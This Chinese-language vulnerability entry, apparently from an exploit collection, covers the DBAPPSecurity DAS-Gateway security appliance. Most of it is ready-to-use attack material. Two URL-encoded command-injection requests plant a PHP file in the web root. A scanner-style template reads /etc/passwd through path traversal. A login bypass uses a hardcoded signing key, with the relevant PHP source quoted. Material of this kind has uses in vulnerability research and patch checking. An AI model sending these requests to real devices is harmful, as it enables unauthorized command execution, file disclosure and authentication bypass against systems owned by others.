# 安恒 明御安全网关 命令执行 任意文件读取漏洞 ## 漏洞描述 安恒信息明御安全网关存在命令执行漏洞,导致攻击者可以直接执行系统命令,从而控制目标系统。 ## 漏洞分析 参考阅读: - https://r0fus0d.blog.ffffffff0x.com/post/oem-case/ ## 漏洞复现 ### 命令执行 1 漏洞 URL: ``` /webui/?g=aaa_portal_auth_local_submit&suffix= ``` poc: ``` /webui/?g=aaa_portal_auth_local_submit&suffix=%0aecho%20%27%3C%3Fphp%20echo%20%22test%20-%20Open%20source%20project%20%28github.com%2Ftest%2Ftest%29%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F111111112.php&bkg_flag=0 ``` ### 命令执行 2 漏洞 URL: ``` /webui/?g=aaa_portal_auth_config_reset&type= ``` poc: ``` /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22test%20-%20Open%20source%20project%20%28github.com%2Ftest%2Ftest%29%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F111111111.php%0a ``` ### 任意文件读取 poc: ``` requests: - method: GET path: - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd" - "{{BaseURL}}/webui/?g=sys_dia_data_check&file_name=../../../../../../../../etc/passwd" - "{{BaseURL}}/webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd" - "{{BaseURL}}/webui/?g=sys_corefile_sysinfo_download&name=../../../../../../../../etc/passwd" ``` ### 验证码绕过 poc: ``` /remote_auth.php?user=admin&pwd=admin&sign=ba84d9dd91eb304aca57f0a8f052623e ``` 其中 sign 硬编码在 `/usr/local/webui/remote_auth.php` 中: ```php if($_GET['user']!=null) $usr = formatget($_GET['user']); if($_GET['pwd']!=null) $pwd = formatget($_GET['pwd']); if($_GET['sign']!=null) $sign = formatget($_GET['sign']); $key= 'saplingos!@#$%^&*';//这个key你们协商后保存一致即可 //ba84d9dd91eb304aca57f0a8f052623e if(empty($usr)){ die('user_null'); } else if(empty($pwd)){ die('pwd_null'); } else if (!$sign){ die('sign_null'); } else if ($sign != md5($key)){ die('sign_error'); } else{ if (isset($usr, $pwd)) { LoginHandler::login($usr, $pwd, $num,'',$remote_auth = true); } $fail_msg = ''; if (LoginHandler::isLoginFail()) { $fail_msg = $_SESSION[ERROR_STR]; if (strlen($fail_msg) <= 0) { $fail_msg = LocalUtil::getCommonResource('login_failed'); } die($fail_msg); } } ``` 可以通过任意文件读取漏洞读取 key,然后进行爆破。